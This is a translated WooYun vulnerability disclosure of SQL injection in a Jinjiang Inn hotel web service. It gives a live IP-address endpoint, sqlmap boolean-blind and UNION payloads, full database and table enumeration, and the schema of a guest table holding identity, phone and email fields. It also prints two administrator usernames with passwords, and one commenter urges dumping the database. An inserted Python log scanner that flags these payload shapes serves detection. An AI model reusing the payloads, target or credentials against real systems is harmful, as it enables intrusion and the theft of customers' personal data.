Vulnerability summary

Defect ID: wooyun-2015-097029

Title: Jinjiang Inn SQL injection vulnerability involving a large amount of user information

Vendor: Jinjiang Inn Co., Ltd. (锦江之星旅馆有限公司)

Author: Me_Fortune

Submitted: 2015-02-12 21:05

Fixed: 2015-03-29 21:06

Published: 2015-03-29 21:06

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor confirmed

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-02-12: Details sent to the vendor, awaiting vendor handling
2015-02-13: Vendor confirmed; details disclosed to the vendor only
2015-02-23: Details disclosed to core white hats and domain experts
2015-03-05: Details disclosed to regular white hats
2015-03-15: Details disclosed to intern white hats
2015-03-29: Details disclosed to the public

Brief description:

VIP users, regular users, names, phone numbers, emails, all sorts of information exposed, more than ten million records........

Detailed description:

Injection point: http://220.196.57.147:8080/GetUnit.aspx?City=3100&service=api_getcitypio
The City parameter is injectable:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: City
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: City=3100' AND 8275=8275 AND 'hJnG'='hJnG&service=api_getcitypio
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: City=3100' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(106)+CHAR(102)+CHAR(112)+CHAR(113)+CHAR(119)+CHAR(71)+CHAR(120)+CHAR(121)+CHAR(97)+CHAR(85)+CHAR(72)+CHAR(113)+CHAR(83)+CHAR(88)+CHAR(113)+CHAR(119)+CHAR(103)+CHAR(100)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &service=api_getcitypio
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
Database: JJWEB_20131025
[67 tables]
+-----------------------------------------------------+
| CDS_UnitRmTp |
| DN_CodeDescript |
| DN_District |
| DN_Unit |
| DN_Unit_Old |
| HT_CRSRmTp |
| HT_PayAccountInnHotel |
| HT_ResvApp |
| HT_UnitInfo |
| HT_UnitPosition |
| HT_UnitRmTp |
| JW_Apply |
| JW_ApplytoJoin |
| JW_BrandInfo |
| JW_BrandInfoCate |
| JW_Bus_XZ |
| JW_Bus_XZ_Hotels |
| JW_Channels |
| JW_ChefInfo |
| JW_ChefInfoCate |
| JW_CityInfo |
| JW_Collect |
| JW_CompanyLink |
| JW_CompanyLinkClass |
| JW_CountryList |
| JW_DataVersion |
| JW_Department |
| JW_DownLoad |
| JW_Education |
| JW_FormService |
| JW_Guest_Consultation |
| JW_Guest_HotelComment |
| JW_HotelComment |
| JW_HotelPhoto |
| JW_InfoPicture |
| JW_InnHotel_NearInfo |
| JW_JobCate |
| JW_JobPosition |
| JW_LinkCate |
| JW_Links |
| JW_MsgStatus |
| JW_NewsWeiXin |
| JW_OftenOrderHotel |
| JW_OftenOrderUser |
| JW_OperationType |
| JW_OrderBuyCard |
| JW_ProInfo |
| JW_ProInfoCate |
| JW_RecType |
| JW_ScoreClass |
| JW_ScoreTrans |
| JW_ServiceList |
| JW_SiteMsg |
| JW_SpecOffs |
| JW_SpecOffsCate |
| JW_SpecOffsType |
| JW_StatisticsClass |
| JW_TuiJian |
| JW_UnitMinPrice |
| JW_UploadFile |
| JW_UserMsgSite |
| JW_UserQPlus |
| JW_WeiXinResv |
| JW_qykh |
| v_SpecOffs_Info |
| v_dnunit_htunitinfo |
| v_hotellist |
+-----------------------------------------------------+
Database: tempdb
[1 table]
+-----------------------------------------------------+
| #6A06A917 |
+-----------------------------------------------------+
Database: WebReport
[5 tables]
+-----------------------------------------------------+
| TrafficOrderCount |
| TrafficStatistics |
| TrafficType |
| vw_TrafficOrderCount |
| vw_TrafficStatistics |
+-----------------------------------------------------+
Database: DataSwitch
[16 tables]
+-----------------------------------------------------+
| CDS_Card |
| CDS_Guest |
| CDS_GuestWebUser |
| CDS_Guest_Invalid |
| CardOperationLog |
| GuestTrans |
| HT_Reception |
| ServiceList |
| ServiceLog |
| T_CARDLIST |
| T_IN_MEMBER_INFO |
| T_IN_RIGHT_CARD |
| T_LOY_POINT |
| T_OUT_MEMBER_INFO |
| T_OUT_RIGHT_CARD |
| T_TXN_LIST |
+-----------------------------------------------------+
Database: JJWEB
[96 tables]
+-----------------------------------------------------+
| Activity |
| ActivityInfo |
| CDS_UnitRmTp |
| CJ_Exchange_Info |
| CJ_Luck_Draw |
| CJ_Prize_Config |
| DN_CodeDescript |
| DN_District |
| DN_Unit |
| DN_Unit_Old |
| HT_CRSRmTp |
| HT_PayAccountInnHotel |
| HT_ResvApp |
| HT_UnitInfo |
| HT_UnitPosition |
| HT_UnitRmTp |
| JW_Activity |
| JW_Apply |
| JW_ApplytoJoin |
| JW_BrandInfo |
| JW_BrandInfoCate |
| JW_Bus_XZ |
| JW_Bus_XZ_Hotels |
| JW_Channels |
| JW_ChefInfo |
| JW_ChefInfoCate |
| JW_CityInfo |
| JW_CityPIOData |
| JW_Collect |
| JW_CompanyLink |
| JW_CompanyLinkClass |
| JW_CountryList |
| JW_Department |
| JW_DiTieXianLu |
| JW_District |
| JW_DownLoad |
| JW_Education |
| JW_FormService |
| JW_Guest_Consultation |
| JW_Guest_HotelComment |
| JW_HotelComment |
| JW_HotelPhoto |
| JW_HotelPhotoNew |
| JW_InfoPicture |
| JW_InnHotel_NearInfo |
| JW_JobCate |
| JW_JobPosition |
| JW_LinkCate |
| JW_Links |
| JW_MsgStatus |
| JW_NewsWeiXin |
| JW_OftenOrderHotel |
| JW_OftenOrderUser |
| JW_OperationType |
| JW_OrderBuyCard |
| JW_PhoneRecharge |
| JW_ProInfo |
| JW_ProInfoCate |
| JW_Questionnaire |
| JW_RecType |
| JW_ScoreClass |
| JW_ScoreTrans |
| JW_ServiceList |
| JW_SiteMsg |
| JW_SpecOffs |
| JW_SpecOffsCate |
| JW_SpecOffsType |
| JW_SpecialCity |
| JW_SpecialCityCopy |
| JW_StatisticsClass |
| JW_TuiJian |
| JW_Unit360Flash |
| JW_UnitLvYun |
| JW_UnitMinPrice |
| JW_UnitToDayPrice |
| JW_UploadFile |
| JW_UserMsgSite |
| JW_UserQPlus |
| JW_WebServicePicList |
| JW_WeiXinResv |
| JW_qykh |
| RecommendLog |
| Table_1 |
| Test |
| Test_trace |
| VistData |
| WX_CDKey |
| WX_Record |
| sqlmapoutput |
| sysdiagrams |
| testes |
| tests |
| v_DN_UnitInfo |
| v_SpecOffs_Info |
| v_dnunit_htunitinfo |
| v_hotellist |
+-----------------------------------------------------+
Database: InterfaceDB
[8 tables]
+-----------------------------------------------------+
| Jiang |
| ServiceList |
| ServiceLog |
| T_OUT_MEMBER_INFO |
| T_OUT_RIGHT_CARD |
| soau.E$_T_OUT_MEMBER_INFO |
| soau.E$_T_OUT_RIGHT_CARD |
| soau.SNP_CHECK_TAB |
+-----------------------------------------------------+
Database: JJWEB_20141013
[82 tables]
+-----------------------------------------------------+
| CDS_UnitRmTp |
| DN_CodeDescript |
| DN_District |
| DN_Unit |
| HT_CRSRmTp |
| HT_PayAccountInnHotel |
| HT_ResvApp |
| HT_UnitInfo |
| HT_UnitPosition |
| HT_UnitRmTp |
| JW_Activity |
| JW_Apply |
| JW_ApplytoJoin |
| JW_BrandInfo |
| JW_BrandInfoCate |
| JW_Bus_XZ |
| JW_Bus_XZ_Hotels |
| JW_Channels |
| JW_ChefInfo |
| JW_ChefInfoCate |
| JW_CityInfo |
| JW_CityPIOData |
| JW_Collect |
| JW_CompanyLink |
| JW_CompanyLinkClass |
| JW_CountryList |
| JW_DataVersion |
| JW_Department |
| JW_DiTieXianLu |
| JW_DownLoad |
| JW_Education |
| JW_FormService |
| JW_Guest_Consultation |
| JW_Guest_HotelComment |
| JW_HotelArea |
| JW_HotelComment |
| JW_HotelPhoto |
| JW_InfoPicture |
| JW_InnHotel_NearInfo |
| JW_JobCate |
| JW_JobPosition |
| JW_LinkCate |
| JW_Links |
| JW_MsgStatus |
| JW_NewsWeiXin |
| JW_OftenOrderHotel |
| JW_OftenOrderUser |
| JW_OperationType |
| JW_OrderBuyCard |
| JW_ProInfo |
| JW_ProInfoCate |
| JW_RecType |
| JW_ScoreClass |
| JW_ScoreTrans |
| JW_ServiceList |
| JW_SiteMsg |
| JW_SpecOffs |
| JW_SpecOffsCate |
| JW_SpecOffsType |
| JW_SpecialCity |
| JW_SpecialCity_20140115 |
| JW_SpecialCity_a |
| JW_StatisticsClass |
| JW_TuiJian |
| JW_Unit360Flash |
| JW_Unit360Flash_1 |
| JW_UnitMinPrice |
| JW_UploadFile |
| JW_UserMsgSite |
| JW_UserQPlus |
| JW_WebServicePicList |
| JW_WeiXinResv |
| JW_qykh |
| MSpeer_lsns |
| MSpeer_originatorid_history |
| RecommendLog |
| V_DN_Unit |
| WX_CDKey |
| WX_Record |
| v_SpecOffs_Info |
| v_dnunit_htunitinfo |
| v_hotellist |
+-----------------------------------------------------+
Database: msdb
[138 tables]
Database: HonorAndJinjiang
[5 tables]
+-----------------------------------------------------+
| Kl_Admin |
| Kl_AdminDo |
| Kl_Lottery |
| Kl_Site |
| dtproperties |
+-----------------------------------------------------+
Database: master
[365 tables]
Database: JJ_RateCodeInventory
[9 tables]
+-----------------------------------------------------+
| CDS_RateIsSelect |
| CDS_UnitRateCode |
| HT_CRSRmTp |
| HT_ChannelGroupInventory |
| HT_ChannelGroupInventory_Tmp |
| HT_ChannelInventory |
| HT_RateCode |
| HT_RateCodeDetail |
| HT_UnitRmTp |
+-----------------------------------------------------+
Database: CRMDB
[7 tables]
+-----------------------------------------------------+
| CDS_Card |
| CDS_Guest |
| CDS_GuestSummary |
| CDS_GuestTrans |
| CDS_GuestWebUser |
| CDS_Guest_Invalid |
| HT_Reception |
+-----------------------------------------------------+
Database: JJWEB_20141124
[82 tables]
+-----------------------------------------------------+
| CDS_UnitRmTp |
| DN_CodeDescript |
| DN_District |
| DN_Unit |
| HT_CRSRmTp |
| HT_PayAccountInnHotel |
| HT_ResvApp |
| HT_UnitInfo |
| HT_UnitPosition |
| HT_UnitRmTp |
| JW_Activity |
| JW_Apply |
| JW_ApplytoJoin |
| JW_BrandInfo |
| JW_BrandInfoCate |
| JW_Bus_XZ |
| JW_Bus_XZ_Hotels |
| JW_Channels |
| JW_ChefInfo |
| JW_ChefInfoCate |
| JW_CityInfo |
| JW_CityPIOData |
| JW_Collect |
| JW_CompanyLink |
| JW_CompanyLinkClass |
| JW_CountryList |
| JW_DataVersion |
| JW_Department |
| JW_DiTieXianLu |
| JW_DownLoad |
| JW_Education |
| JW_FormService |
| JW_Guest_Consultation |
| JW_Guest_HotelComment |
| JW_HotelArea |
| JW_HotelComment |
| JW_HotelPhoto |
| JW_InfoPicture |
| JW_InnHotel_NearInfo |
| JW_JobCate |
| JW_JobPosition |
| JW_LinkCate |
| JW_Links |
| JW_MsgStatus |
| JW_NewsWeiXin |
| JW_OftenOrderHotel |
| JW_OftenOrderUser |
| JW_OperationType |
| JW_OrderBuyCard |
| JW_ProInfo |
| JW_ProInfoCate |
| JW_RecType |
| JW_ScoreClass |
| JW_ScoreTrans |
| JW_ServiceList |
| JW_SiteMsg |
| JW_SpecOffs |
| JW_SpecOffsCate |
| JW_SpecOffsType |
| JW_SpecialCity |
| JW_SpecialCity_20140115 |
| JW_SpecialCity_a |
| JW_StatisticsClass |
| JW_TuiJian |
| JW_Unit360Flash |
| JW_Unit360Flash_1 |
| JW_UnitMinPrice |
| JW_UploadFile |
| JW_UserMsgSite |
| JW_UserQPlus |
| JW_WebServicePicList |
| JW_WeiXinResv |
| JW_qykh |
| MSpeer_lsns |
| MSpeer_originatorid_history |
| RecommendLog |
| V_DN_Unit |
| WX_CDKey |
| WX_Record |
| v_SpecOffs_Info |
| v_dnunit_htunitinfo |
| v_hotellist |
+-----------------------------------------------------+
Database: DataSwitch
Table: CDS_Guest
[34 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| Address | varchar |
| Birthday | char |
| CAddress | nvarchar |
| CardNo | varchar |
| Cds_Status | int |
| Company | nvarchar |
| CTel | varchar |
| CtfId | varchar |
| CtfTp | varchar |
| CZip | nvarchar |
| Descript | varchar |
| Dirty | char |
| District1 | varchar |
| District2 | varchar |
| District3 | varchar |
| District4 | varchar |
| District5 | varchar |
| District6 | varchar |
| Duty | nvarchar |
| Education | varchar |
| EMail | nvarchar |
| Family | int |
| Fax | nvarchar |
| FirstNm | varchar |
| Gender | char |
| Id | int |
| LastNm | varchar |
| Mobile | varchar |
| Name | nvarchar |
| Nation | nvarchar |
| Taste | varchar |
| Tel | nvarchar |
| Version | datetime |
| Zip | nvarchar |
+------------+----------+
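The sqlmap output above shows the two probe shapes that hit the City parameter of GetUnit.aspx: a quoted boolean tautology and a UNION ALL SELECT padded with NULL columns and a CHAR()+CHAR() marker string. The following is an added detection example, not code from the report or from the Jinjiang Inn site: it parses IIS W3C extended log lines (field order assumed from the constructed "#Fields:" header) and flags requests whose decoded City value matches those shapes. All log lines, IP addresses and timestamps are constructed.

```python
"""Detect the two sqlmap payload shapes from this report in IIS W3C log lines.

Added example, not part of the WooYun report or of the Jinjiang Inn code base.
It assumes IIS 6.0 W3C extended logging with the field order in the "#Fields:"
header below; the log lines, IP addresses and timestamps are constructed.
"""
import re
from typing import Optional
from urllib.parse import parse_qs, unquote

# Field order must match the "#Fields:" header of the log being scanned.
FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
          "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status"]

# Each rule is applied to the URL-decoded value of a watched parameter.
RULES = {
    # City=3100' AND 8275=8275 AND 'hJnG'='hJnG  -> quote, then a tautology
    "boolean_blind_tautology": re.compile(
        r"'\s*(?:AND|OR)\s+(\w+)\s*=\s*\1\b", re.IGNORECASE),
    # City=3100' UNION ALL SELECT NULL,NULL,...  -> UNION padded with NULL columns
    "union_null_columns": re.compile(
        r"UNION\s+(?:ALL\s+)?SELECT\s+(?:NULL\s*,\s*){2,}", re.IGNORECASE),
    # CHAR(n)+CHAR(n)+... is the MSSQL idiom sqlmap uses to build marker strings
    "mssql_char_concat": re.compile(
        r"(?:CHAR\(\d{1,3}\)\s*\+\s*){3,}CHAR\(\d{1,3}\)", re.IGNORECASE),
    # "--" at the end truncates the remainder of the original query
    "trailing_comment": re.compile(r"--\s*$"),
}


def parse_iis_line(line: str) -> Optional[dict]:
    """Split one W3C log line into a dict; directive and blank lines give None."""
    if line.startswith("#") or not line.strip():
        return None
    parts = line.split(" ")
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def inspect_request(stem: str, query: str, watched=("City",)) -> list:
    """Return the sorted names of rules that fire on watched parameters."""
    if not stem.lower().endswith("/getunit.aspx"):
        return []
    hits = set()
    # parse_qs decodes once; unquote again so a double-encoded payload is seen too
    for name in watched:
        for value in parse_qs(query, keep_blank_values=True).get(name, []):
            decoded = unquote(value)
            hits.update(rule for rule, rx in RULES.items() if rx.search(decoded))
    return sorted(hits)


def scan_log(lines) -> list:
    """Run the rules over W3C log lines; one finding per suspicious request."""
    findings = []
    for line in lines:
        rec = parse_iis_line(line)
        if rec is None:
            continue
        hits = inspect_request(rec["cs-uri-stem"], rec["cs-uri-query"])
        if hits:
            findings.append({"time": rec["date"] + " " + rec["time"],
                             "client": rec["c-ip"],
                             "agent": rec["cs(User-Agent)"],
                             "rules": hits})
    return findings


# Constructed sample: one benign request, then the two probe shapes from the report.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2015-02-12 13:05:01 192.0.2.10 GET /GetUnit.aspx City=3100&service=api_getcitypio 8080 - 203.0.113.7 Mozilla/5.0 200
2015-02-12 13:05:02 192.0.2.10 GET /GetUnit.aspx City=3100'%20AND%208275=8275%20AND%20'hJnG'='hJnG&service=api_getcitypio 8080 - 203.0.113.7 sqlmap/1.0 200
2015-02-12 13:05:03 192.0.2.10 GET /GetUnit.aspx City=3100'%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(113)%2BCHAR(106)%2BCHAR(102)%2BCHAR(112),NULL,NULL--%20&service=api_getcitypio 8080 - 203.0.113.7 sqlmap/1.0 200
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f["time"], f["client"], f["agent"], ", ".join(f["rules"]))
```

Detection of this kind complements the actual fix, which is to bind the City value as a query parameter in the ASP.NET data-access code instead of concatenating it into the SQL string.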

Proof of vulnerability:

[screenshot: 10.png]


Names, phone numbers, emails

[screenshot: 11.png]


Then I tried dumping it, but it was too large and the dump did not finish.
Administrators:

[screenshot: 12.png]


[screenshot: 13.png]


Here are two of the administrator accounts: admin 19840113; lottery 19840113
How do I know there are more than ten million records? I'd need a database-dumping expert to show me....

[screenshot: 13.png]


Fix recommendation:

I know you'll ignore this = ,-, I didn't dig any deeper, please don't come after me....

Copyright notice: please credit the source when reposting: Me_Fortune@WooYun


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 1

Confirmed: 2015-02-13 15:22

Vendor reply:

This system is a test system; the vulnerability does exist, and staff have been assigned to fix it. Thank you.

Latest status:

None yet


Vulnerability evaluation:

Comments

  1. 2015-02-13 00:43 | Yang ( Regular white hat | Rank:247 Vulns:86 | As a newbie, what do I do if my "big rice" phone gets smashed?)

    Chinese New Year is coming.. the big shots are starting to stay in hotels again

  2. 2015-02-13 07:11 | Me_Fortune ( Regular white hat | Rank:209 Vulns:71 | I'm Me_Fortune)

    The last image was uploaded by mistake.... @xsser

  3. 2015-02-13 15:36 | Me_Fortune ( Regular white hat | Rank:209 Vulns:71 | I'm Me_Fortune)

    Heh heh, I checked: the JJWEB database in there was reported before and you gave that 15 rank; the same database exists here and now you say it's a test system, who are you kidding? @Jinjiang Inn Co., Ltd.

  4. 2015-02-13 15:52 | hkAssassin ( Regular white hat | Rank:358 Vulns:66 | I am a caterpillar.)

    Even if it is a test system, anything that involves user data is a problem. Giving 1 rank is a bit stingy...

  5. 2015-02-13 15:52 | her0ma ( Core white hat | Rank:598 Vulns:84 | Thirty years focused on small vendors!)

    @hkAssassin The data belongs to real users; 1 rank is too little.

  6. 2015-02-13 15:55 | hkAssassin ( Regular white hat | Rank:358 Vulns:66 | I am a caterpillar.)

    @her0ma Judging from the OP's reply, it should be real user data!

  7. 2015-03-16 14:15 | 小指头 ( Intern white hat | Rank:97 Vulns:19 | A pinky that doesn't want to be a thumb isn't a good hand.)

    Everything that has a problem is a "test system", only just noticed?

  8. 2015-03-16 22:19 | Me_Fortune ( Regular white hat | Rank:209 Vulns:71 | I'm Me_Fortune)

    @小指头 The injection point is still there, go and see for yourself, thanks

  9. 2015-03-30 00:16 | 我不得踢噶 ( Passer-by | Rank:8 Vulns:3 | Hello world!)

    1 point, go dump the database quick.

  10. 2015-03-30 00:38 | 李旭敏 ( Regular white hat | Rank:469 Vulns:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    @Me_Fortune Be content; look at the previous vulnerability WooYun: Jinjiang Inn massive room-booking information leak vulnerability (suspected ten-million-level orders). Order information leaked and they simply ignored it.. this kind of vendor, heh

  11. 2015-03-30 09:53 | llkoio ( Passer-by | Rank:20 Vulns:3 | Love network security!)

    May I ask how you found the injection point? I'm a noob; 啊D doesn't seem to work well anymore. Do you try link by link by hand, or is there some good tool?

  12. 2015-03-30 10:50 | Me_Fortune ( Regular white hat | Rank:209 Vulns:71 | I'm Me_Fortune)

    Write your own crawler tool...

  13. 2015-03-31 00:01 | 静默 ( Passer-by | Rank:8 Vulns:6 | security newbie)

    1 rank is absolutely a rip-off; 20 wouldn't be too much, the number of users involved is huge. One gripe: Jinjiang Inn's hotels are lousy, didn't expect them to disrespect security people too